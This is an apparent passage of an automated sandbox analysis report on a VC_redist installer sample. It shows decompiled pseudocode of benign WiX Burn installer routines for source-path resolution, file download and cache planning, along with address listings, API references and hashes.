						if(_t79 >= 0) {
							L12:
							_t85 = _v24;
							__eflags = _t85;
							if(_t85 == 0) {
								L18:
								_t127 = E0001738E(_t113, _v60, L"WixBundleLayoutDirectory",  &_v40);
								__eflags = _t127 - 0x80070490;
								if(_t127 == 0x80070490) {
									L24:
									_t114 = 0;
									_t112 = 0;
									 *_v48 = 0;
									if(_t121 == 0) {
										_t121 = _v52;
										L33:
										_t127 = E000121A5(_t121, _v20, _t114);
										if(_t127 >= 0) {
											L36:
											if(_v32 != 0) {
												E000554EF(_v32);
											}
											if(_v36 != 0) {
												E000554EF(_v36);
											}
											if(_v24 != 0) {
												E000554EF(_v24);
											}
											if(_v28 != 0) {
												E000554EF(_v28);
											}
											if(_v40 != 0) {
												E000554EF(_v40);
											}
											if(_v44 != 0) {
												E000554EF(_v44);
											}
											return E0003DE36(_t112, _v8 ^ _t128, _t119, _t121, _t127);
										}
										L34:
										_push("Failed to copy source path.");
										L35:
										_push(_t127);
										E0005012F();
										goto L36;
									} else {
										goto L25;
									}
									while(1) {
										L25:
										_t99 = E00054315( *((intOrPtr*)(_t128 + _t112 * 4 - 0x10)), _t114);
										if(_t99 != 0) {
											break;
										}
										_t112 =  &(_t112[0]);
										_t114 = _t99;
										if(_t112 < _t121) {
											continue;
										}
										_t102 = _v48;
										_t121 = _v52;
										L30:
										_t114 = 0;
										if( *_t102 != 0) {
											goto L36;
										}
										goto L33;
									}
									_t121 = _v52;
									_t127 = E000121A5(_v52,  *((intOrPtr*)(_t128 + _t112 * 4 - 0x10)), 0);
									__eflags = _t127;
									if(_t127 < 0) {
										goto L34;
									}
									_t102 = _v48;
									 *_t102 = 1;
									goto L30;
								}
								__eflags = _t127;
								if(_t127 >= 0) {
									_t127 = E00012D79(_t113, _v40, _t112,  &_v44);
									__eflags = _t127;
									if(_t127 >= 0) {
										 *((intOrPtr*)(_t128 + _t121 * 4 - 0x10)) = _v44;
										_t121 = _t121 + 1;
										__eflags = _t121;
										goto L24;
									}
									_push("Failed to combine layout source with source.");
									goto L35;
								}
								_push("Failed to get bundle layout directory property.");
								goto L35;
							}
							_t113 = 0;
							__eflags =  *_t85;
							if( *_t85 == 0) {
								goto L18;
							}
							_t113 =  &_v28;
							_t127 = E00012D79( &_v28, _t85, _t112,  &_v28);
							__eflags = _t127;
							if(_t127 < 0) {
								L10:
								_push("Failed to combine last source with source.");
								goto L35;
							}
							__eflags = _t121;
							if(_t121 == 0) {
								L17:
								 *((intOrPtr*)(_t128 + _t121 * 4 - 0x10)) = _v28;
								_t121 = _t121 + 1;
								__eflags = _t121;
								goto L18;
							}
							_t109 = CompareStringW(0, 1, _v20, 0xffffffff, _v28, 0xffffffff);
							__eflags = _t109 - 2;
							if(_t109 == 2) {
								goto L18;
							}
							goto L17;
						}
						goto L7;
					}
				}
				_v20 = _t112;
				_t121 = 1;
				goto L24;
			}
































                                                                          0x00029f36
                                                                          0x00029f3c
                                                                          0x00029f43
                                                                          0x00029f49
                                                                          0x00029f4b
                                                                          0x00029f52
                                                                          0x00029f55
                                                                          0x00029f5d
                                                                          0x00029f65
                                                                          0x00029f68
                                                                          0x00029f6c
                                                                          0x00029f6f
                                                                          0x00029f72
                                                                          0x00029f73
                                                                          0x00029f76
                                                                          0x00029f79
                                                                          0x00029f7c
                                                                          0x00029f7d
                                                                          0x00029f86
                                                                          0x00029f91
                                                                          0x00029f96
                                                                          0x00029fa3
                                                                          0x00029fa8
                                                                          0x00029fad
                                                                          0x00029fb9
                                                                          0x00029fbe
                                                                          0x00029fc0
                                                                          0x00029fc9
                                                                          0x00029fc9
                                                                          0x00029fc0
                                                                          0x00029fce
                                                                          0x00029fd4
                                                                          0x00029fda
                                                                          0x00029fe4
                                                                          0x00029feb
                                                                          0x00029fed
                                                                          0x0002a001
                                                                          0x0002a008
                                                                          0x0002a00a
                                                                          0x0002a01b
                                                                          0x0002a01e
                                                                          0x0002a01e
                                                                          0x00000000
                                                                          0x0002a01e
                                                                          0x00000000
                                                                          0x0002a00a
                                                                          0x00029fef
                                                                          0x00000000
                                                                          0x00029fd6
                                                                          0x00029fd6
                                                                          0x00029fd8
                                                                          0x0002a01f
                                                                          0x0002a01f
                                                                          0x0002a022
                                                                          0x0002a024
                                                                          0x0002a064
                                                                          0x0002a075
                                                                          0x0002a077
                                                                          0x0002a07d
                                                                          0x0002a0af
                                                                          0x0002a0b2
                                                                          0x0002a0b4
                                                                          0x0002a0b6
                                                                          0x0002a0ba
                                                                          0x0002a100
                                                                          0x0002a103
                                                                          0x0002a10d
                                                                          0x0002a111
                                                                          0x0002a120
                                                                          0x0002a124
                                                                          0x0002a129
                                                                          0x0002a129
                                                                          0x0002a132
                                                                          0x0002a137
                                                                          0x0002a137
                                                                          0x0002a140
                                                                          0x0002a145
                                                                          0x0002a145
                                                                          0x0002a14e
                                                                          0x0002a153
                                                                          0x0002a153
                                                                          0x0002a15c
                                                                          0x0002a161
                                                                          0x0002a161
                                                                          0x0002a16a
                                                                          0x0002a16f
                                                                          0x0002a16f
                                                                          0x0002a186
                                                                          0x0002a186
                                                                          0x0002a113
                                                                          0x0002a113
                                                                          0x0002a118
                                                                          0x0002a118
                                                                          0x0002a119
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0002a0bc
                                                                          0x0002a0bc
                                                                          0x0002a0c1
                                                                          0x0002a0c8
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0002a0ca
                                                                          0x0002a0cc
                                                                          0x0002a0cf
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0002a0d1
                                                                          0x0002a0d4
                                                                          0x0002a0f8
                                                                          0x0002a0f8
                                                                          0x0002a0fc
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0002a0fe
                                                                          0x0002a0d9
                                                                          0x0002a0e9
                                                                          0x0002a0eb
                                                                          0x0002a0ed
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0002a0ef
                                                                          0x0002a0f2
                                                                          0x00000000
                                                                          0x0002a0f2
                                                                          0x0002a07f
                                                                          0x0002a081
                                                                          0x0002a09a
                                                                          0x0002a09c
                                                                          0x0002a09e
                                                                          0x0002a0aa
                                                                          0x0002a0ae
                                                                          0x0002a0ae
                                                                          0x00000000
                                                                          0x0002a0ae
                                                                          0x0002a0a0
                                                                          0x00000000
                                                                          0x0002a0a0
                                                                          0x0002a083
                                                                          0x00000000
                                                                          0x0002a083
                                                                          0x0002a026
                                                                          0x0002a028
                                                                          0x0002a02b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0002a02d
                                                                          0x0002a038
                                                                          0x0002a03a
                                                                          0x0002a03c
                                                                          0x0002a00c
                                                                          0x0002a00c
                                                                          0x00000000
                                                                          0x0002a00c
                                                                          0x0002a03e
                                                                          0x0002a040
                                                                          0x0002a05c
                                                                          0x0002a05f
                                                                          0x0002a063
                                                                          0x0002a063
                                                                          0x00000000
                                                                          0x0002a063
                                                                          0x0002a051
                                                                          0x0002a057
                                                                          0x0002a05a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0002a05a
                                                                          0x00000000
                                                                          0x00029fd8
                                                                          0x00029fd4
                                                                          0x00029f88
                                                                          0x00029f8b
                                                                          0x00000000

                                                                          Strings
                                                                          • WixBundleLastUsedSource, xrefs: 00029F9D
                                                                          • Failed to combine layout source with source., xrefs: 0002A0A0
                                                                          • Failed to combine last source with source., xrefs: 0002A00C
                                                                          • Failed to get current process directory., xrefs: 00029FEF
                                                                          • WixBundleLayoutDirectory, xrefs: 0002A068
                                                                          • Failed to get bundle layout directory property., xrefs: 0002A083
                                                                          • Failed to copy source path., xrefs: 0002A113
                                                                          • WixBundleOriginalSource, xrefs: 00029FB3
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Find$CloseFileFirstlstrlen
                                                                          • String ID: Failed to combine last source with source.$Failed to combine layout source with source.$Failed to copy source path.$Failed to get bundle layout directory property.$Failed to get current process directory.$WixBundleLastUsedSource$WixBundleLayoutDirectory$WixBundleOriginalSource
                                                                          • API String ID: 2767606509-3003062821
                                                                          • Opcode ID: 4e8e68fbfd9f6be5a4e2e800d45aba92ff68151091e8db7ea02beb69e5ec72cd
                                                                          • Instruction ID: c6c1df31982de4096dfbe575b18158174cdc067ac9bcc338b3d0e67b4ce19935
                                                                          • Opcode Fuzzy Hash: 4e8e68fbfd9f6be5a4e2e800d45aba92ff68151091e8db7ea02beb69e5ec72cd
                                                                          • Instruction Fuzzy Hash: 76714071E00229AFDF11DFA4EC41AFEBBB9AF09715F100129F911B7251DB359D908B62
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00055916 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 194filememoryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 62%
                                                                          			E00055916(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a20, signed short _a24, WCHAR* _a28, signed short _a32, signed short _a36, char _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56) {
				signed int _v8;
				signed short _v12;
				signed int _v16;
				char _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				void* _v28;
				WCHAR* _v32;
				signed short _v36;
				void* _t61;
				signed short _t62;
				signed short _t63;
				void* _t64;
				void* _t65;
				signed short _t76;
				signed short _t81;
				signed short _t84;
				void* _t85;
				signed short _t88;
				signed short _t89;
				signed short _t92;
				signed short _t93;
				signed short _t94;
				signed short _t97;

				_v12 = 1;
				_t92 = 0;
				_v24 = 0;
				_t88 = 0;
				_v20 = 0;
				asm("xorps xmm0, xmm0");
				_v8 = 0;
				_t94 = 0;
				_v16 = 0;
				asm("movlpd [ebp-0x20], xmm0");
				_t61 = CreateFileW(_a20, 0xc0000000, 4, 0, 4, 0x80, 0);
				_v28 = _t61;
				if(_t61 != 0xffffffff) {
					_t62 = VirtualAlloc(0, 0x10000, 0x3000, 4);
					_v24 = _t62;
					__eflags = _t62;
					if(_t62 != 0) {
						_t63 = _a36;
						_t89 = _a32;
						_a20 = _t63;
						_a36 = _t89;
						while(1) {
							__eflags = _t89;
							if(_t89 != 0) {
								goto L9;
							}
							__eflags = _t63;
							if(_t63 != 0) {
								goto L9;
							}
							_t89 = _a24;
							_t63 = _a28;
							L12:
							_t94 = E00055890(_t89, _a40, _a44, _t89, _t63,  &_v20);
							__eflags = _t94;
							if(_t94 < 0) {
								L30:
								__eflags = _t88;
								if(_t88 != 0) {
									 *0x7a96c(_t88);
								}
								__eflags = _t92;
								if(_t92 != 0) {
									 *0x7a96c(_t92);
								}
								L34:
								if(_v20 != 0) {
									E000554EF(_v20);
								}
								_t64 = _v24;
								if(_t64 != 0) {
									VirtualFree(_t64, 0, 0x8000);
								}
								_t65 = _v28;
								if(_t65 != 0xffffffff) {
									CloseHandle(_t65);
								}
								return _t94;
							}
							__eflags = _t92;
							if(_t92 != 0) {
								 *0x7a96c(_t92);
								_t20 =  &_v8;
								 *_t20 = _v8 & 0x00000000;
								__eflags =  *_t20;
							}
							__eflags = _t88;
							if(_t88 != 0) {
								 *0x7a96c(_t88);
								_t22 =  &_v16;
								 *_t22 = _v16 & 0x00000000;
								__eflags =  *_t22;
							}
							_t76 = E00055D7F(_a4, _a8, L"GET", _v20, _a12, _a16, _a56,  &_v8,  &_v16,  &_v12);
							_t88 = _v16;
							_t94 = _t76;
							__eflags = _t94;
							if(_t94 < 0) {
								L29:
								_t92 = _v8;
								goto L30;
							} else {
								_t90 = _a36;
								_t77 = _a20;
								__eflags = _t90;
								if(_t90 != 0) {
									L22:
									_t93 = _v12;
									L23:
									__eflags = _t93;
									if(_t93 == 0) {
										asm("xorps xmm0, xmm0");
										asm("movlpd [ebp+0x2c], xmm0");
									}
									_t94 = E000561FA(_t90, _t88, _v28,  &_a40, _a48, _t90, _t77, _v24, 0x10000, _a52);
									__eflags = _t94;
									if(_t94 < 0) {
										goto L29;
									} else {
										__eflags = _t93;
										_t92 = _v8;
										if(_t93 == 0) {
											goto L30;
										}
										_t63 = _a20;
										_t89 = _a36;
										continue;
									}
								}
								__eflags = _t77;
								if(_t77 != 0) {
									goto L22;
								}
								_t81 = E000588BE(_t90, _t88,  &_v36);
								__eflags = _t81;
								if(_t81 < 0) {
									_t90 = _a24;
									_t93 = 0;
									_t77 = _a28;
									_a36 = _a24;
									_a20 = _a28;
									_v12 = 0;
									goto L23;
								}
								_t90 = _v36;
								_t77 = _v32;
								_a36 = _v36;
								_a20 = _v32;
								goto L22;
							}
							L9:
							__eflags = _a44 - _t63;
							if(__eflags > 0) {
								goto L30;
							}
							if(__eflags < 0) {
								goto L12;
							}
							__eflags = _a40 - _t89;
							if(_a40 >= _t89) {
								goto L30;
							}
							goto L12;
						}
					}
					_t84 = GetLastError();
					__eflags = _t84;
					_t97 =  <=  ? _t84 : _t84 & 0x0000ffff | 0x80070000;
					_t85 = 0x80004005;
					__eflags = _t97;
					_t94 =  >=  ? 0x80004005 : _t97;
					_push(_t94);
					_push(0x126);
					L2:
					_push("dlutil.cpp");
					E000137D3(_t85);
					goto L34;
				}
				_t100 =  <=  ? GetLastError() : _t87 & 0x0000ffff | 0x80070000;
				_t85 = 0x80004005;
				_t94 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t87 & 0x0000ffff | 0x80070000;
				_push(_t94);
				_push(0x121);
				goto L2;
			}


























                                                                          0x00055921
                                                                          0x0005593b
                                                                          0x0005593d
                                                                          0x00055940
                                                                          0x00055942
                                                                          0x00055945
                                                                          0x00055948
                                                                          0x0005594b
                                                                          0x0005594d
                                                                          0x00055950
                                                                          0x00055955
                                                                          0x0005595b
                                                                          0x00055961
                                                                          0x000559a4
                                                                          0x000559aa
                                                                          0x000559ad
                                                                          0x000559af
                                                                          0x000559d7
                                                                          0x000559da
                                                                          0x000559dd
                                                                          0x000559e0
                                                                          0x000559e3
                                                                          0x000559e3
                                                                          0x000559e5
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000559e7
                                                                          0x000559e9
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000559eb
                                                                          0x000559ee
                                                                          0x00055a07
                                                                          0x00055a18
                                                                          0x00055a1a
                                                                          0x00055a1c
                                                                          0x00055af3
                                                                          0x00055af3
                                                                          0x00055af5
                                                                          0x00055af8
                                                                          0x00055af8
                                                                          0x00055afe
                                                                          0x00055b00
                                                                          0x00055b03
                                                                          0x00055b03
                                                                          0x00055b09
                                                                          0x00055b0d
                                                                          0x00055b12
                                                                          0x00055b12
                                                                          0x00055b17
                                                                          0x00055b1c
                                                                          0x00055b26
                                                                          0x00055b26
                                                                          0x00055b2c
                                                                          0x00055b32
                                                                          0x00055b35
                                                                          0x00055b35
                                                                          0x00055b43
                                                                          0x00055b43
                                                                          0x00055a22
                                                                          0x00055a24
                                                                          0x00055a27
                                                                          0x00055a2d
                                                                          0x00055a2d
                                                                          0x00055a2d
                                                                          0x00055a2d
                                                                          0x00055a31
                                                                          0x00055a33
                                                                          0x00055a36
                                                                          0x00055a3c
                                                                          0x00055a3c
                                                                          0x00055a3c
                                                                          0x00055a3c
                                                                          0x00055a63
                                                                          0x00055a68
                                                                          0x00055a6b
                                                                          0x00055a6d
                                                                          0x00055a6f
                                                                          0x00055af0
                                                                          0x00055af0
                                                                          0x00000000
                                                                          0x00055a71
                                                                          0x00055a71
                                                                          0x00055a74
                                                                          0x00055a77
                                                                          0x00055a79
                                                                          0x00055a99
                                                                          0x00055a99
                                                                          0x00055a9c
                                                                          0x00055a9c
                                                                          0x00055a9e
                                                                          0x00055aa0
                                                                          0x00055aa3
                                                                          0x00055aa3
                                                                          0x00055ac5
                                                                          0x00055ac7
                                                                          0x00055ac9
                                                                          0x00000000
                                                                          0x00055acb
                                                                          0x00055acb
                                                                          0x00055acd
                                                                          0x00055ad0
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00055ad2
                                                                          0x00055ad5
                                                                          0x00000000
                                                                          0x00055ad5
                                                                          0x00055ac9
                                                                          0x00055a7b
                                                                          0x00055a7d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00055a84
                                                                          0x00055a89
                                                                          0x00055a8b
                                                                          0x00055add
                                                                          0x00055ae0
                                                                          0x00055ae2
                                                                          0x00055ae5
                                                                          0x00055ae8
                                                                          0x00055aeb
                                                                          0x00000000
                                                                          0x00055aeb
                                                                          0x00055a8d
                                                                          0x00055a90
                                                                          0x00055a93
                                                                          0x00055a96
                                                                          0x00000000
                                                                          0x00055a96
                                                                          0x000559f3
                                                                          0x000559f3
                                                                          0x000559f6
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000559fc
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000559fe
                                                                          0x00055a01
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00055a01
                                                                          0x000559e3
                                                                          0x000559b1
                                                                          0x000559c0
                                                                          0x000559c2
                                                                          0x000559c5
                                                                          0x000559ca
                                                                          0x000559cc
                                                                          0x000559cf
                                                                          0x000559d0
                                                                          0x00055987
                                                                          0x00055987
                                                                          0x0005598c
                                                                          0x00000000
                                                                          0x0005598c
                                                                          0x00055974
                                                                          0x00055977
                                                                          0x0005597e
                                                                          0x00055981
                                                                          0x00055982
                                                                          0x00000000

                                                                          APIs
                                                                          • CreateFileW.KERNEL32(000000FF,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,00000000,00000000,00000078,00000000,000000FF,?,00000000,00000000), ref: 00055955
                                                                          • GetLastError.KERNEL32 ref: 00055963
                                                                          • VirtualAlloc.KERNEL32(00000000,00010000,00003000,00000004), ref: 000559A4
                                                                          • GetLastError.KERNEL32 ref: 000559B1
                                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00055B26
                                                                          • CloseHandle.KERNEL32(?), ref: 00055B35
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastVirtual$AllocCloseCreateFileFreeHandle
                                                                          • String ID: @Met$GET$dlutil.cpp
                                                                          • API String ID: 2028584396-1172224916
                                                                          • Opcode ID: 51822875d224c0c0953b82b528d0c56eb026aaeebe20169ae640949132d78740
                                                                          • Instruction ID: cfe1e92f2e1c3bec09041af6ba7057aeef5c901a76fcf00c2f5db41204adb85f
                                                                          • Opcode Fuzzy Hash: 51822875d224c0c0953b82b528d0c56eb026aaeebe20169ae640949132d78740
                                                                          • Instruction Fuzzy Hash: FD618A75A00619ABEF51CFA4CC94BEF7BB9BF08352F114219FE05B2290E77498448BA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00020AAE Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 182COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 82%
                                                                          			E00020AAE(void* __ecx, void* __eflags, signed int _a4, intOrPtr* _a8, signed short* _a12) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _t78;
				signed int _t79;
				intOrPtr* _t82;
				signed int _t83;
				intOrPtr* _t87;
				intOrPtr* _t96;
				signed short _t101;
				signed short _t104;
				intOrPtr* _t109;
				int* _t112;
				signed int _t113;
				void* _t114;
				intOrPtr _t122;
				signed short _t127;
				signed int _t129;
				signed int _t130;
				signed short _t133;
				intOrPtr* _t134;
				signed int _t135;
				intOrPtr* _t136;

				_t114 = __ecx;
				_t113 = _a4;
				_t134 = _a8;
				_t127 = 0;
				_v8 = _v8 & 0;
				if(E00020E7E(_t113,  *_t134, _a12) == 0) {
					_t78 =  *0x7aa60; // 0x0
					_t79 = _t78 + 1;
					_a4 = _t79;
					 *0x7aa60 = _t79;
					if(E00020EF3(_t114, _t113,  &_v8) >= 0) {
						_t82 = _v8;
						_t115 = _a4;
						_t124 = 1;
						 *_t82 = 1;
						 *((intOrPtr*)(_t82 + 8)) = _a4;
						_t83 =  *((intOrPtr*)(_t134 + 0x60));
						_v12 = _t83;
						__eflags = _t83 - 1;
						if(_t83 != 1) {
							L8:
							_t127 = E00020EF3(_t115, _t113,  &_v8);
							__eflags = _t127;
							if(_t127 < 0) {
								goto L2;
							} else {
								_t87 = _v8;
								 *_t87 = 3;
								 *((intOrPtr*)(_t87 + 8)) = _t134;
								_t89 =  *((intOrPtr*)(_t113 + 0x50)) - 1;
								__eflags = _v12 - 1;
								_a4 =  *((intOrPtr*)(_t113 + 0x50)) - 1;
								if(_v12 != 1) {
									L12:
									_t129 = 0;
									_v12 = 0;
									__eflags =  *(_t134 + 0x80);
									if(__eflags > 0) {
										while(1) {
											_v16 =  *((intOrPtr*)(_t134 + 0x7c));
											_t127 = E00020F3A(_t124, __eflags, _t113, _t134, _t89,  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x7c)) + _t129 * 8)),  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x7c)) + 4 + _t129 * 8)), 0);
											__eflags = _t127;
											if(_t127 < 0) {
												break;
											}
											_t135 = _a4 * 0x28;
											_t130 = _v12;
											 *((intOrPtr*)(_t135 +  *((intOrPtr*)(_t113 + 0x4c)) + 0xc)) =  *((intOrPtr*)(_t135 +  *((intOrPtr*)(_t113 + 0x4c)) + 0xc)) + 1;
											_t115 =  *((intOrPtr*)(_v16 + _t130 * 8));
											_t124 =  *((intOrPtr*)(_t113 + 0x4c));
											 *((intOrPtr*)(_t135 +  *((intOrPtr*)(_t113 + 0x4c)) + 0x10)) =  *((intOrPtr*)(_t135 +  *((intOrPtr*)(_t113 + 0x4c)) + 0x10)) +  *((intOrPtr*)( *((intOrPtr*)(_v16 + _t130 * 8)) + 0x10));
											asm("adc [esi+edx+0x14], eax");
											_t129 = _t130 + 1;
											_t134 = _a8;
											_v12 = _t129;
											__eflags = _t129 -  *(_t134 + 0x80);
											if(__eflags < 0) {
												_t89 = _a4;
												continue;
											} else {
												goto L13;
											}
											goto L24;
										}
										_push("Failed to append payload cache action.");
										goto L3;
									} else {
										L13:
										_t127 = E00020EF3(_t115, _t113,  &_v8);
										__eflags = _t127;
										if(_t127 >= 0) {
											_t96 = _v8;
											 *_t96 = 4;
											 *((intOrPtr*)(_t96 + 8)) = _t134;
											 *((intOrPtr*)(_a4 * 0x28 +  *((intOrPtr*)(_t113 + 0x4c)) + 0x18)) =  *((intOrPtr*)(_t113 + 0x50)) - 1;
											_t127 = E00020EF3(_a4 * 0x28, _t113,  &_v8);
											__eflags = _t127;
											if(_t127 < 0) {
												goto L14;
											} else {
												_t136 = _v8;
												 *_t136 = 6;
												_t101 = CreateEventW(0, 1, 0, 0);
												 *(_t136 + 8) = _t101;
												__eflags = _t101;
												if(_t101 != 0) {
													 *_a12 = _t101;
													_t122 = _a8;
													 *((intOrPtr*)(_t113 + 0x34)) =  *((intOrPtr*)(_t113 + 0x34)) + 1;
													__eflags =  *((intOrPtr*)(_t122 + 0x44)) - 2;
													_t74 =  *((intOrPtr*)(_t122 + 0x44)) != 2;
													__eflags = _t74;
													 *(_t122 + 0x54) = 0 | _t74;
												} else {
													_t104 = GetLastError();
													__eflags = _t104;
													_t133 =  <=  ? _t104 : _t104 & 0x0000ffff | 0x80070000;
													__eflags = _t133;
													_t127 =  >=  ? 0x80004005 : _t133;
													E000137D3(0x80004005, "plan.cpp", 0x860, _t127);
													_push("Failed to create syncpoint event.");
													goto L3;
												}
											}
										} else {
											L14:
											_push("Failed to append cache action.");
											goto L3;
										}
									}
								} else {
									_t127 = E000212BC(_t115, _t113,  &_v8);
									__eflags = _t127;
									if(_t127 < 0) {
										goto L6;
									} else {
										_t109 = _v8;
										 *_t109 = 5;
										 *((intOrPtr*)(_t109 + 8)) = _t134;
										_t89 = _a4;
										goto L12;
									}
								}
							}
						} else {
							_t127 = E000212BC(_t115, _t113,  &_v8);
							__eflags = _t127;
							if(_t127 >= 0) {
								_t112 = _v8;
								_t115 = _a4;
								 *_t112 = 1;
								_t112[2] = _a4;
								goto L8;
							} else {
								L6:
								_push("Failed to append rollback cache action.");
								goto L3;
							}
						}
					} else {
						L2:
						_push("Failed to append package start action.");
						L3:
						_push(_t127);
						E0005012F();
					}
				}
				L24:
				return _t127;
			}


























                                                                          0x00020aae
                                                                          0x00020ab5
                                                                          0x00020ab9
                                                                          0x00020ac0
                                                                          0x00020ac4
                                                                          0x00020acf
                                                                          0x00020ad5
                                                                          0x00020ada
                                                                          0x00020adb
                                                                          0x00020ade
                                                                          0x00020af1
                                                                          0x00020b05
                                                                          0x00020b0a
                                                                          0x00020b0d
                                                                          0x00020b0e
                                                                          0x00020b10
                                                                          0x00020b13
                                                                          0x00020b16
                                                                          0x00020b19
                                                                          0x00020b1b
                                                                          0x00020b43
                                                                          0x00020b4d
                                                                          0x00020b4f
                                                                          0x00020b51
                                                                          0x00000000
                                                                          0x00020b53
                                                                          0x00020b53
                                                                          0x00020b56
                                                                          0x00020b5c
                                                                          0x00020b62
                                                                          0x00020b63
                                                                          0x00020b67
                                                                          0x00020b6a
                                                                          0x00020b8b
                                                                          0x00020b8b
                                                                          0x00020b8d
                                                                          0x00020b90
                                                                          0x00020b96
                                                                          0x00020bb5
                                                                          0x00020bba
                                                                          0x00020bcc
                                                                          0x00020bce
                                                                          0x00020bd0
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00020bd2
                                                                          0x00020bd9
                                                                          0x00020bdf
                                                                          0x00020be3
                                                                          0x00020be6
                                                                          0x00020bec
                                                                          0x00020bf3
                                                                          0x00020bf7
                                                                          0x00020bf8
                                                                          0x00020bfb
                                                                          0x00020bfe
                                                                          0x00020c04
                                                                          0x00020bb2
                                                                          0x00000000
                                                                          0x00020c06
                                                                          0x00000000
                                                                          0x00020c06
                                                                          0x00000000
                                                                          0x00020c04
                                                                          0x00020c08
                                                                          0x00000000
                                                                          0x00020b98
                                                                          0x00020b98
                                                                          0x00020ba2
                                                                          0x00020ba4
                                                                          0x00020ba6
                                                                          0x00020c12
                                                                          0x00020c19
                                                                          0x00020c1f
                                                                          0x00020c29
                                                                          0x00020c37
                                                                          0x00020c39
                                                                          0x00020c3b
                                                                          0x00000000
                                                                          0x00020c41
                                                                          0x00020c41
                                                                          0x00020c4b
                                                                          0x00020c51
                                                                          0x00020c57
                                                                          0x00020c5a
                                                                          0x00020c5c
                                                                          0x00020c99
                                                                          0x00020c9d
                                                                          0x00020ca0
                                                                          0x00020ca3
                                                                          0x00020ca7
                                                                          0x00020ca7
                                                                          0x00020caa
                                                                          0x00020c5e
                                                                          0x00020c5e
                                                                          0x00020c6d
                                                                          0x00020c6f
                                                                          0x00020c77
                                                                          0x00020c79
                                                                          0x00020c87
                                                                          0x00020c8c
                                                                          0x00000000
                                                                          0x00020c8c
                                                                          0x00020c5c
                                                                          0x00020ba8
                                                                          0x00020ba8
                                                                          0x00020ba8
                                                                          0x00000000
                                                                          0x00020ba8
                                                                          0x00020ba6
                                                                          0x00020b6c
                                                                          0x00020b76
                                                                          0x00020b78
                                                                          0x00020b7a
                                                                          0x00000000
                                                                          0x00020b7c
                                                                          0x00020b7c
                                                                          0x00020b7f
                                                                          0x00020b85
                                                                          0x00020b88
                                                                          0x00000000
                                                                          0x00020b88
                                                                          0x00020b7a
                                                                          0x00020b6a
                                                                          0x00020b1d
                                                                          0x00020b27
                                                                          0x00020b29
                                                                          0x00020b2b
                                                                          0x00020b34
                                                                          0x00020b37
                                                                          0x00020b3a
                                                                          0x00020b40
                                                                          0x00000000
                                                                          0x00020b2d
                                                                          0x00020b2d
                                                                          0x00020b2d
                                                                          0x00000000
                                                                          0x00020b2d
                                                                          0x00020b2b
                                                                          0x00020af3
                                                                          0x00020af3
                                                                          0x00020af3
                                                                          0x00020af8
                                                                          0x00020af8
                                                                          0x00020af9
                                                                          0x00020aff
                                                                          0x00020af1
                                                                          0x00020cad
                                                                          0x00020cb5

                                                                          APIs
                                                                            • Part of subcall function 00020E7E: CompareStringW.KERNEL32(00000000,00000000,feclient.dll,000000FF,00000000,000000FF,00000000,00000000,?,?,00020ACD,?,00000000,?,00000000,00000000), ref: 00020EAD
                                                                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,00000000,?,00000000,00000001,?,?,00000000,?,00000000), ref: 00020C51
                                                                          • GetLastError.KERNEL32 ref: 00020C5E
                                                                          Strings
                                                                          • Failed to append package start action., xrefs: 00020AF3
